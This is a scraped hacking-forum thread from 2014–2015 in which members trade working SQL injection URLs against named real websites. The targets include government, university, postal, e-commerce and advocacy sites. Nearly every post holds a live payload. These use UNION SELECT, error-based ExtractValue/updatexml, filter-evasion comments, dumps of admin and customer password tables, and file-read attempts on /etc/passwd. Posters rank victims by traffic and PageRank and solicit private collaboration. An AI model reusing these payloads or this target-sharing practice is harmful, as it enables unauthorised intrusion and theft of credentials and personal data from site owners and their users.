PR6

http://www.geologie.ac.at/index.php?id=225&projectid=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25+--+

unic0rn
12.08.2014, 08:22
Code:
http://www.nassnig.org/nass/news.php?id=-584+UNION+SELECT+1,user(),3,version(),database(),6 ,7,8+--+

Nigerian National Assembly

Alexa: 427,927

PR: 6

OxoTnik
12.08.2014, 19:35
http://www.msh.ru/gallery.php?did=-3+union+select+1,concat_ws(0x3a,login,password)+fr om+admin

DezMond™
14.08.2014, 02:16
http://www.iaurif.org/index.php?id=615&iaurif_publications_aff%5Betude%5D=-798)+UnIOn/**//**//**//**//**/+/**//**//**//**//**//**//**//**//**//**/SElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60+--+&cHash=7e9e071a42e29c23273d4efd70892d43

WallHack
16.08.2014, 14:28
5.5.32-cll


Code:
http://kvadrostyle.ru/page/catalog.php?id=-1633%27+union+select+1,2,@@version,4,5,6,7,8,9,10+--+

Yandex TIC 250

unic0rn
17.08.2014, 03:52
Code:
http://www.mbc.edu/baldwin-job-board/detail.php?id=1000+AND+1=0+UNION+SELECT+1,2,3,user %28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+

PR:5


Code:
http://proyectos.diariosur.es/cronica-universitaria/descargar.php?id=-21+UNION+SELECT+1,2,user(),4,5,6,7+--+

MQ: On

FP: Y

Alexa: 9,866

PR: 7


Code:
http://apps.jifsan.umd.edu/portal/courses_pages.php?cid=-18%27+union+select+1,2,user(),database(),5,6,7,8,9 ,10+--+

Alexa: 8,772

PR: 6


Code:
http://www.atlantic.edu/about/news/article.php?article=-991+union+select+1,user(),3,4,5,6,7,8,9,10,11,12

PR: 6

WallHack
20.08.2014, 20:46
The output appears where the products are listed


Code:
http://faunamarket.com/catalog.php?id=1%27+union+select+1,@@version+--+

5.1.73-cll

Yandex TIC 50, Pr 1/10

There is a forum running phpbb3

MaxFast
22.08.2014, 18:12
http://55let.rudn.ru/i/U.png


Code:
http://55let.rudn.ru/news.php?id=-35+union+select+1,2,concat(user(),0x3a,version()), 4,5,6,7,8,9--

root@localhost:5.6.11

55 years old, and they still write leaky engines.

Unknown
23.08.2014, 13:17
Code:
http://www.tennis-piter.ru/pagerub.php?rub=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4--



Code:
5.1.63-0+squeeze1-log:z75741_portal@77.221.130.13:z75741_portal

unic0rn
25.08.2014, 00:06
Code:
http://www.businessownersideacafe.com/small_business_grants/winner.php?grant_id=-1+UNION+SELECT+user()+--+

PR: 6

Nothing interesting. I included the SQLi so the post wouldn't count as flood.

Gentlemen, I need advice on SQL injections, includes and so on.

Joint digging into juicy links that I'd rather not post publicly. If anyone is interested, PM me, please.

kingbeef
29.08.2014, 00:33
Code:
http://game.vietgiaitri.com/vui-nhon-12.vgt+and+(ExtractValue(1,concat(0x3a,user(),0x3a ,version(),0x3a,database())))



Code:
game@192.168.1.3:5.6.19:vietgia

Unknown
30.08.2014, 20:07
Code:
http://www.unatech.org/pagerub.php?cat_id=-21+union+select+1,2,3,4,5,6,@@version,8,9--



Code:
5.1.56

DezMond™
04.09.2014, 19:08
PR8

http://pendientedemigracion.ucm.es/info/revesco/EdicionElectronica.php?IdRevista=-33+UnIoN/**//**//**//**//**/+/**//**//**//**//**//**//**//**//**//**//**//**//**//**//**/sELEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,6 8,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84+ from+TRUsuarios+--+

look2009
10.09.2014, 02:31
http://www.minambiente.gov.co/index.php?option=com_spidercalendar&calendar_id=1+union+select+1,version(),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18+--+

ninja96c
11.09.2014, 12:16
http://100bestschools.net/eng/school/?school=-80+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,version(),20,21,22,23,24--+


output is in the error

kingbeef
11.09.2014, 13:41
Code:
http://mail.aaa.com.ua/news/18838.html'or(ExtractValue(1,concat(0x3a,(select(v ersion())))))='1

5.5.38-0ubuntu0.12.04.1

Output is in the alert.

DezMond™
13.09.2014, 12:23
http://archiv.jura.uni-saarland.de/entschdb/lagsaarland/dboutput.php?id=-42'+union+select+user(),2+--+

hpol
22.09.2014, 14:04
Code:
http://teleskop.ru/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,File_Priv,4,5,6,7,8,9,10+from+m ysql.user--&Itemid=3227

mysql 5.0.45

file priv y

TIC 140 pr 3

faza02
22.09.2014, 16:36
Code:
http://www.asep7.gov.la/show.php?id=-15'+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2+--+

pr 5

WallHack
22.09.2014, 18:50
File Priv Y


Code:
http://border-terrier.ru/video.php?id=-11+union+select+1,File_Priv,3,4,5,6+from++mysql.us er--

Mysql 5.1.49-3

TIC 20

Unknowhacker
23.09.2014, 01:30
Official site of the mayor and city council of Donetsk


Code:
http://www.lukyanchenko.donetsk.ua/public_echo.php?id=122%27+union+select+1,2,version (),4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+

Version: 4.1.22-max-log

Unknown
23.09.2014, 03:17
Code:
http://www.laobooking.com/city_destination.php?cid=-9%27+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4+--+

Unknown
26.09.2014, 20:19
Especially for all football fans:

Seria B


Code:
http://www.asavellino.com/notizia.php?id=-7984+union+select+1,2,3,4,5,concat_ws(0x3a,version (),user(),database()),7,8--



Code:
http://www.bolognafc.it/news.asp?id=1+and+1=convert(int,@@version)--
http://www.bolognafc.it/news.asp?id=1+and+1=convert(int,db_name())--
http://www.bolognafc.it/news.asp?id=1+and+1=convert(int,user_name())--
http://www.bolognafc.it/news.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+%20not+in+(%27Wallpaper%27)))--



Code:
http://www.livornocalcio.it/notizie/notizie.php?id=-9939+union+select+1,2,3,concat_ws(0x3a,version(),u ser(),database()),5,6,7,8,9,10,11,12+--+



Code:
http://www.ternanacalcio.com/index.php?module=loadContenuto&id=5&padre=-28%27+AND+substring(@@version, 1, 1)=5

and of course, how could we do without Seria A


Code:
http://www.hellasverona.it/scheda.php?id=-330'+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13+--+

OxoTnik
04.10.2014, 13:17
http://legendsofbaseball.com/?cid=-1+union+select+1,2,3,@@version

DezMond™
07.10.2014, 17:43
PR7

http://www.destinationquebec.com/medias/section.php?section=01&sm=01&Langue=fr&cle_idee=-2986'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40+--+

kingbeef
10.10.2014, 11:52
http://www.vokrugsveta.ru/photo/location/11/?limit=2&sort=publish_date1+and(select+1+from(select+count( *),concat((select+concat_ws(0x3a,version(),user(), database())),floor(rand(0)*2))x+from+information_s chema.tables+group+by+x)a)--+g

5.0.86:vokrugsv@localhost:vokrugsv

unic0rn
16.10.2014, 21:55
Code:
http://transparencia.redsalud.gov.cl/transparencia/public/auditorias_historico.php?id=-9967'+UNION+SELECT+user()+--+

file_priv: Y

Unknown
18.10.2014, 19:44
Code:
http://www.firstgulf.com/search-details.php?id=-59+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10,11+--+

Unknown
22.10.2014, 22:52
Code:
http://www.dawnbooksupply.co.uk/product.php?id=-114+union+select+1,2,@@version,4+--+

CTRL+U -> look at line 358 and see the answer =


Code:

faza02
22.10.2014, 23:55
Code:
http://monicasantana.de/main.php?id=brautmode-kollektion-uebersicht&kollektion=-12%27+union+select+1,@@version,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+

look2009
23.10.2014, 07:25
Code:
http://www.prolink2u.com/new/products/print_prod.php?cid=75%27+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,concat_ws(0x3a,0x3a,0x3a,c ust_id,cust_fname,cust_lname,cust_city,cust_countr y,cust_dob,cust_email,cust_password,0x3a),17,18+fr om+tbcustinfo+--+

Unknown
25.10.2014, 01:48
Code:
http://www.top15poker.com/news/category.php?cid=-2+union+select+1,@@version,3--

Unknown
11.11.2014, 15:37
The Indian epic Mahabharata

(CY) 10

(PR) 2


Code:
http://www.eraved.com.ua/mahabharata.php?id=-106%27+union+select+User(),2,version(),4,5--+

"Зимовье Зверей"

(CY) 350

(PR) 3


Code:
http://zzverey.spb.ru/list.php?id=23&text=-379+union+select+1,2,User(),version(),5,6--

unic0rn
15.11.2014, 12:45
University of Washington

PR: 6

TIC: 275


Code:
http://depts.washington.edu/trnews/wi06b/article.php?ar_id=-62+union+select+1,user(),3,4,5+--+

Municipal enterprise "Kharkiv Heating Networks"

PR: 3

TIC: 60


Code:
http://www.hts.kharkov.ua/news_full.php?id=-17'+UNION+SELECT+1,2,user()+--+

University of London. Senate House Libraries

PR: 6

TIC: 10


Code:
http://w01.shlexternal.wf.ulcc.ac.uk/res/databases.php?id=-Law'+UNION+SELECT+1,user(),3,4,5,6,7+--+

New Jersey Institute of Technology. Computer Science Department

PR: 4

TIC: 30


Code:
http://web.njit.edu/cs/CS_Seminar/schedule.php?id=-243'+UNION+SELECT+1,database(),user(),version()+--+

University of Wisconsin-Madison. Waisman Center

PR: 7

TIC: 20


Code:
http://www.waisman.wisc.edu/cedd/events/details.php?id=415'+UNION+SELECT+1,2,3,user(),5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30+--+

Unknown
20.11.2014, 22:48
Code:
http://www.skye.co.uk/local-media-shop.php?catid=-14+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6--




psihoz26
24.11.2014, 12:37
posbankusa.com


Code:
http://www.posbankusa.com/jboard/point-of-sale-support/notice.html?page=&job=content&Bcode=notice&board_idx=-3+union+select+1,2,3,4,5,concat(database(),0x3b,ve rsion()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23+--+

version() - 5.1.67

Unknown
24.11.2014, 23:21
HTML:
http://posbankcanada.com/jboard/point-of-sale-support/notice.html?page=&job=content&Bcode=notice&board_idx=-3+union+select+1,2,3,4,5,concat(database(),0x3b,ve rsion()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23+--+

posbankusa;5.1.67

psihoz26
29.11.2014, 15:47
Code:
http://www.otido.ua/main.php?l=71+or(updatexml(1,c%6fncat(0x3a,user()) ,1))

version - 5.1.33

user - root@localhost

Zen1T21
30.11.2014, 21:31
del_

faza02
05.12.2014, 02:43
Code:
http://www.maestrosvault.com/search.php
'and(extractvalue(1,concat(0x3a,(SELECT adminPassword FROM admin))))and(1)='1

5


Code:
http://rechport-ykt.ru/uslugishow.php?i=-9+/*!12345union+select*/+1,2,version(),4,5,6

ver 4


Code:
http://www.frsky-rc.com/download/down.php?id=121+and(extractvalue(1,concat(0x3a,(se lect+column_name+from+information_schema.columns+w here+table_name=0x61646d696e+limit+5,1))))--+

5

unic0rn
05.12.2014, 03:27
Mamas Rezepte

PR: 3

TIC: 10


Code:
http://www.mamas-rezepte.de/drucken.php?rezept=-1458+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25+--+

IPA. Ruhr-Universität Bochum

PR: 6

TIC: 0


Code:
http://www.ipa.ruhr-uni-bochum.de/e/publik/litera/literaliste.php?refid=1912'+UNION+SELECT+1,user(), 3,4,5,6,7,8,9,10,11,12,13,14+--+

National Liberation Movement

TIC: 350

PR: 3

Traffic: 11k unique visitors per day


Code:
http://rusnod.ru/poisk.php?tagz=11+UNION+SELECT+1,2+--+

Official website of the Russian space observatory TESIS

TIC: 700

PR: 5


Code:
http://www.tesis.lebedev.ru/show_img.php?did=0+UNION+SELECT+1,2,3,4,5,6,user() ,8,9,10+--+


// 1 day = 1 post

Unknown
05.12.2014, 21:38
Australian College of Pharmacy


Code:
http://www.acp.edu.au/image.php?id=1+union+select+1,2,3,concat_ws(0x3a,v ersion(),user(),database())--&output=tag

Australian Photographic Engineering Pty Ltd


Code:
http://www.aupassportphoto.com.au/category.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9--



Code:
http://shop.paintballshop.ee/article.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--&lang=est

faza02
08.12.2014, 20:21
Code:
http://www.sandwichglassmuseum.org/events.php?pgID=15+div(0)union(select(0),0,0,1,0,0 ,0,0,0,0,0,0,0,0,0,0)

file_priv Y

5.0.91


Code:
http://www.greyhighlands.ca/explore.php?pgid=207+div(0)union(select(1),2,3,4,5 ,6,7,8,9,10,11,12)--+

5.5

unic0rn
10.12.2014, 06:05
Iranian Facebook


Code:
http://iranfacebook.net/ticket/ticketa.php?user=-3'+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63 ,64,65,66,67,68,69,70,71,72+--+

Jamsho0T
11.12.2014, 04:38
Code:
http://www.geebeauty.com/toronto.php?page=Laser-Hair-Removal%27+/*!12345union*/+/*!12345select*/+1,2,3,version(),5,6+--+

5.5.40-MariaDB

PR 4

alexa 2,064,183

output is in the title

unic0rn
15.12.2014, 10:46
IKEA


Code:
http://midseasong.ikea.de/index.php?eh_pfad=-muenchen_eching'+union+select+1,2,3,user(),5,6,7,8 ,9,10+--+

A batch of some Russian sites:


Code:
http://humor.zooclub.ru/anekdots.php?id=-112+union+select+user(),2



Code:
http://fm01.ru/listen.php?post_id=-809'+union+select+1,2,user(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18+--+



Code:
http://bazatabletok.ru/instruktsiya-po-primeneniyu.php?id=-3034+union+select+1,user(),3,4,5,6,7,8,9,10+--+



Code:
http://www.gmsn.ru/object.php?sobj=-podolsk2'+union+select+1,user(),3,4,5,6,7,8,9,10,1 1,12,13,14,15+--+



Code:
http://strugi.ellink.ru/browse/show_news_type.php?r_id=-115+union+select+1,2,3,4,user(),6,7+--+



Code:
http://www.sex-leshiy.ru/sex_post.php?id=-184'+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),1 3,14,15,16+--+



Code:
http://volvo.autopassage.ru/index.php?id=-48'+union+select+1,2,3,4,5,6,database(),8,9,10,11, 12,13+--+



Code:
http://www.kapepa.ru/vivodvakansii1_cat2.php?cat2=-32'+union+select+1,2,user(),4,5,6+--+



Code:
http://www.forgun.ru/information.php?info_id=-9'+union+select+user())+--+



Code:
http://volvo.autopassage.ru/index.php?id=-48+union+select+1,2,3,4,5,6,user(),8,9,10,11,12,13 +--+






Code:
http://www.forgun.ru/information.php?info_id=-9'+union+select+user()+--+



Code:
http://forum.cleper.ru/answer.php?id=15'+union+select+1,2,user(),4,5,6+--+



Code:
http://yobiz.ru/view_post.php?id=-223э+union+select+1,2,3,user(),5,6,7,8,9,10+--+



Code:
http://residentevillive.ru/index.php?view=-289+union+select+1,user(),3,4,5,6+--+

Unknown
16.12.2014, 21:26
Code:
http://www.avenued.com/europe/merchandise/index.php?ID=-48+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18--

Jamsho0T
19.12.2014, 06:45
Code:
http://www.metall.kiev.ua/answer.php?id=-4423+UNION+SELECT+concat_ws(0x3,user(),version(),d atabase()),2

smirno1_smirnov@localhost 5.5.35-33.0-logs mirno1_metall

PR 1

YA 10

whoever takes this further, write me a PM )

compod
24.12.2014, 14:05
TIC 120, PR 1, version 5.5.30-30.2-log, output goes to the page source


Code:
anabel.by/model.php?id=15860-1=0+union+select+(select+concat(0x7c,(anabel_users .id),0x7c,(anabel_users.name),0x7c,(anabel_users.p ass))+from+`goloveynikolaj1_anabel`.anabel_users+o rder+by+id+limit+3,1),700,700,700,700,700,700,700, 700,700,700,700,700,700,700,700,700,700,700,700 --+

Version 5.1.73. Some interesting foreign shop, takes cards, PayPal, etc. Output is in the product field


Code:
http://wexocom.com/wholesale.php?id=999999.9'+union+select+700,(selec t+concat(concat_ws(0x7c,users.id_user,users.userna me,users.password))+from+`dorofte542_wexocom`.user s+where+users.id_user=1),700,700,700,700,700,700,7 00,700,700,700,700,700,700,700,700,700,700,700,700 ,700,700,700,700,700,700,700,700,700,700+and+'x'=' x

5.1.56-log, PR 4, some ordinary foreign shop


Code:
exaclair2.com/show_stores.php?id=99999.9'+union+select+900,(sele ct+concat(group_concat(table_name))+from+informati on_schema.tables+where+table_schema='buynow'),900 --+

TIC 220, PR 4, version 5. Got everything out, but the admin panel is locked down tight. Though maybe I didn't try hard enough. And in the reviews form the simplest XSS goes through.


Code:
http://jfc-club.spb.ru/news/news.php?id=999999.9+union+select+1,2,(select+conc at(concat_ws(0x7c,user.user_id,user.user_login,use r.user_password))+from+`st1352_jazznotes`.user+whe re+user.user_id=1),4,5,6,7,8--

junk


Code:
http://comedycafe-dostavka.ru/index.php?id=999999.9'+union+select+777,777,777,(s elect+concat(concat_ws(0x7c,pass.id,pass.username, pass.password))+from+`comedycafe_bring`.pass+where +pass.id=1),777,777,777,777,777,777,777,777,777,77 7,777 -- x

SyavaK2
27.12.2014, 23:47
Code:
http://dulevo-rus.ru/news/news.php?news_id=1+union+select+1,user(),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18--



Code:
http://broddsweden.ru/publication/index.php?publicationtree_id=1%20and%20(select%201 %20from(select%20count(*),concat(version(),floor(r and(0)*2))x%20from%20information_schema.tables%20g roup%20by%20x)a);



Code:
http://www.dejavu28.ru/news.php?page_id=3&action=post&post_id=999999.9+union+all+select+1,2,3,4,user(),6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+

Unknown
02.01.2015, 02:44
Code:
http://www.remax.net.pe/detalle_noticias.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9,10,11,12,13,14,15,16,17, 18--&lang=esp

Unknown
04.01.2015, 15:51
Code:
http://www.humor.co.il/category.php?id=-61+union+select+1,2,3,4,5,6,7,8,CONCAT_WS%28CHAR%2 832,58,32%29,user%28%29,database%28%29,version%28% 29%29,10,11,12,13,14,15--

Unknown
05.01.2015, 00:29
Anguilla Postal Service


Code:
http://www.aps.ai/newsstory.php?id=-8+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6--

5.1.73-cllostoffice@localhostost_office

Unknown
09.01.2015, 01:44
Code:
http://www.swissvalley.com/news.cfm?id=-18+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12,13,14,15--

Br@!ns
12.01.2015, 02:01
PHP:
http://www.flexcart.com/members/elitefts/default.asp?m=CT&pid=-5105'+union+select+1,2,aes_decrypt(aes_encrypt(use r(),1),1),4,5,6,7,8,9,10,11,12,13,14,null,null,nul l,null,null,null,null,null,null,null+--+

Unknown
18.01.2015, 20:41
Code:
http://www.puntoverdefolletto.com/prodotto.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--

faza02
22.01.2015, 15:55
Code:
http://www.dostihyjc.cz/kun.php?ID=40271;select+cast(version()+as+int)--+

postgresql 7, have a play with it

erwap
23.01.2015, 21:21
Code:
http://www.hohe-absaetze.de/shop/html/index.php?Cat=MULES-AND-SLIDES&POS=1&LandVal=US&sprache=29&DID=30 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,user(),15,16 --

Unknown
24.01.2015, 01:05
Code:
http://www.maytech.fr/produit.php?id=-124+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),user(),database()),7,8,9,10,11,12,13,14,15,16--

MaxFast
24.01.2015, 17:34
http://web.ufps.kemtel.ru/templates/logo.png

Federal Postal Service Directorate (UFPS) of Kemerovo Oblast, a branch of FSUE "Russian Post"


Code:
http://web.ufps.kemtel.ru/index.php?page=news_pod&id=-561'+union+select+1,2,concat(user(),0x3a,version() ),4,5,6,7+--+

administrator@localhost:5.5.37-0ubuntu0.12.04.1

Unknown
25.01.2015, 01:24
Code:
http://www.skydome.eu/professionnels/produits/fiche-produit.php?id=-11+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11,12,13,14,15--

faza02
25.01.2015, 13:32
Code:
http://www.inter-system.com.pl/tresc.php?id=60+and+1=cast(version()+as+int)--+

PostgreSQL 8.3.17

palec2006
27.01.2015, 03:34
http://www.meridian4.com/games/'+and(select+1+from(select+count(*),concat((select +(select+(select+version())+)+from+%60information_ schema%60.tables+limit+0,1),floor(rand(0)*2))x+fro m+%60information_schema%60.tables+group+by+x)a)+an d+'1'='1


TIC:20

PR:4

SHA1


http://gazeta.comments.ua/?art=1342083260+and(select+1+from(select+count(*), concat((select+(select+(select+concat(0x27,0x7e,un hex(Hex(cast(version()+as+char))),0x7e,0x27)+from+ %60gazeta%60.cm_users+Order+by+pass+limit+8,1)+)+f rom+%60information_schema%60.tables+limit+0,1),flo or(rand(0)*2))x+from+%60information_schema%60.tabl es+group+by+x)a)+and+1%3D1


TIC:300

PR:5

MaxFast
27.01.2015, 19:41
Code:
http://www.wlki.com/news.php?sb_news_id=-1'+union+select+1,2,3,4,5,6,user()29,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37+--+

swickbro_amy@localhost

Unknown
27.01.2015, 20:22
Code:
http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())--

Federal Postal Service Directorate (UFPS) of Volgograd Oblast, a branch of FSUE "Russian Post"

5.1.53-log:root@localhost:ufps

erwap
29.01.2015, 13:16
Code:
http://wearisit.com/category.php?id=-2 union select 1,2,user(),4,5,6,7,8,9 --+

PR 2

unic0rn
29.01.2015, 20:19
Federal Arbitration Courts of the Russian Federation

TIC: 7000

PR: 6


Code:
http://calc.arbitr.ru/index.php?ac_id=-44'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,user(),19,20,21,22,23,24,25,26,27,28,29+--+

Taking the opportunity: I'm looking for work. Write me a PM.

// Don't confuse the TIC of the main domain with the TIC of subdomains! YaBtr

// There is access to the main domain there too! unic0rn

erwap
30.01.2015, 12:51
PR 1


Code:
http://http://www.safaripositano.com/catalogo/catalogo.php?a=0&tipo=-1+union+select+version(),2,3,4,5,6,7,8,9,10,11,12+--+

DezMond™
03.02.2015, 20:41
PR7

http://www.lebenslanges-lernen.at/home/nationalagentur_lebenslanges_lernen/erasmus_hochschule/erasmus_oesterreich/berichte_praktikumsaufenthalt/?no_cache=1&tx_praktikumsbericht_pi1%5Bview%5D=selectHeiminst&tx_praktikumsbericht_pi1%5Bcity%5D=KREMS%22+union+ select+1,2+--+?no_cache=1&tx_praktikumsbericht_pi1%5Bview%5D=selectHeiminst

palec2006
06.02.2015, 00:56
http://eizvestia.com/info?inf_cat_id=and+extractvalue(1,concat(0x3a,(ve rsion())))and


A site of lies

TIC:3000

PR:5

Alexa:21330

Traffic:180k

admin_id:447

for the VK profile see:


wp_option.skylark_vk_admin_email, wp_option.skylark_vk_admin_password


----------------------------------


http://military-police.net/Marketplace/index.php?route=product/search&letter=-1'and+extractvalue(1,concat(0x3a,(select+version() )))and'


TIC:20

PR:2

Opencart

op_pins

op_setting ->config_encryption

op_setting ->email->Steam (+PayPal?)

Unknown
07.02.2015, 14:29
Universidad de Guadalajara


Code:
http://www.gaceta.udg.mx/G_nota1.php?id=-14888%20UNION%20SELECT%201,2,3,4,5,6,7,@@version,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42, 43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59--+

5.1.51

palec2006
08.02.2015, 06:05
http://visavis.ru/
Referer: 1'and+extractvalue(1,concat(0x3a,(version())))and'


5.5.40-MariaDB

output is at the bottom of the page

MaxFast
08.02.2015, 12:56
Code:
http://cuct.ru/?page=-1'+union+select+1,2,3,version(),5,6,7,8+--+

5.5.30-30.2-log


Due to a large number of orders, a competitive selection is starting for the position of PHP programmer in the development department. Required knowledge: HTML, PHP, MySQL, JavaScript.
Want to join a team of professionals?

Unknown
08.02.2015, 19:18
Mariano Moreno Instituto Superior



Code:
http://www.mariano-moreno.com.ar/index.php?put=novedad-amp&id=-1126+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7--

5.0.96-community:mm0233_sitionew@localhost:mm0233_sitione w

kingbeef
10.02.2015, 02:24
MPGU


Code:
http://www.mpgu.edu/abiturientam/voprosy-po-postupleniyu/napravleniya_podgotovki_i_vstupitelnyye_ispytaniya _po_facultetam/?fac=inohhgfhfhgfhstr%27+and(select+1+from(select+ count(*),concat((select+table_name+from+informatio n_schema.tables+limit+0,1),floor(rand(0)*2))x+from +information_schema.tables+group+by+x)a)--+g

5.1.61-0ubuntu0.11.10.1

DezMond™
10.02.2015, 12:09
PR7

http://www.mdw.ac.at/mdwStreaming/onDemand.php?StueckID=-21'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,user(),18,19,20+--+

Unknown
10.02.2015, 23:28
I love football))


Code:
http://www.koff.kz/readnews.php?id=-6+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6--

5.1.69-log:koff@localhost:futbol2014

palec2006
11.02.2015, 07:12
http://www.motorherz.ru/product.php?id=90009'+and+extractvalue(1,concat(0x 3a,(version())))and+'1'='1


Windows

MaxFast
11.02.2015, 19:43
Saint Petersburg LGBT organization "Coming Out"


Code:
http://comingoutspb.com/ru/materialyi-po-proektu?project=1+and+updatexml(1,concat(0x3a,(sel ect concat(version(),0x3a,database()))),1)

XPATH syntax error: ':5.5.41-0+wheezy1:comingun_db1'

Unknown
11.02.2015, 23:23
Code:
http://www.kanda.com/readnews.php?id=-17+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versi on(),user(),database()),9,10--

5.5.30:kanda@ikona.biz:kanda_kandadb

MaxFast
13.02.2015, 18:44
http://www.farmanager.com/img/title_light.png


Code:
http://plugring.farmanager.com/author.php?aid=-9+union+select+1,2,3,4,5,6,concat(user(),0x3a,data base(),0x3a,version()),8,9,10,11,12,13,14--

plugring@localhostlugring:5.5.41-0ubuntu0.14.04.1

The admins have been notified.

YaBtr
13.02.2015, 18:59
MaxFast said:
http://www.farmanager.com/img/title_light.png

Code:
http://plugring.farmanager.com/author.php?aid=-9+union+select+1,2,3,4,5,6,concat(user(),0x3a,data base(),0x3a,version()),8,9,10,11,12,13,14--

plugring@localhostlugring:5.5.41-0ubuntu0.14.04.1
The admins have been notified.


A repost

Proof link /showpost.php?p=2483739&postcount=13493

But we'll leave it, it's a different script.

Unknown
14.02.2015, 00:21
Code:
http://actachemscand.dk/author.php?aid=-1126+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4--

5.1.63-0ubuntu0.11.04.1:acta@localhost:acta 4

palec2006
14.02.2015, 08:38
http://www.sportzone.ru/total/table.html?id=148+and+extractvalue(1,concat(0x3a,( version())))and+1=1


Betting pool

TIC:50

Yandex Catalog

1k of traffic

redirects in the browser

Unknown
14.02.2015, 11:33
Code:
http://www.team221.com/order.php?cat=-3+union+select+concat_ws(0x3a,version(),user(),dat abase())--

MaxFast
14.02.2015, 16:34
http://rockbay.ru/img/main_logo.png


Code:
http://rockbay.ru/category/1?order_brend=1+and+extractvalue(1,concat(0x3a,(se lect+concat(version(),0x3a,database(),0x3a,user()) )))--

5.5.41-0ubuntu0.12.04.1:rockbay

Official website of the administration of the city of Noyabrsk


Code:
http://admnoyabrsk.ru/onenews.php?kat=-2211+UNION+ALL+SELECT 1,CONCAT(version(),0x3a,database(),0x3a,user())--&news=389

5.1.41-log:admnoyabrs_db:admnoyabrs_mysql@10.1.117.115

Administration of the urban district of the city of Volzhsky


Code:
http://www.admvol.ru/TopNews/podrobno.asp?id=5'+or+1=@@version--

Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

grimnir
15.02.2015, 14:24
http://www.deenakastor.com/recipe_print.php?num=6' and 999999.9 union all select 1,2,concat(version(),0x3a,user()),4,5 and '1'='1


5.5.32-log:deenakastor@10.1.112.62

psihoz26
15.02.2015, 15:45
http://smart-elec.ru/noo.php?page1=506&page2=42&razdel=5&info=-163'+union+select+'
../../../../../../../../../../../../etc/hosts
',concat(version(),0x3a,user())+--+


5.5.35-33.0

u0967474_smart@localhost

The situation is similar to the third video (https://antichat.live/threads/422072/)

and one more


http://www.footystatcenter.com/center/index.php?userid=2747&lang=6+union+select+1,2,concat(0x2e2e2f2e2e2f2e2e2 f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6 574632f706173737764)+--+


the hex is /etc/passwd

Look at the title tag



kingbeef
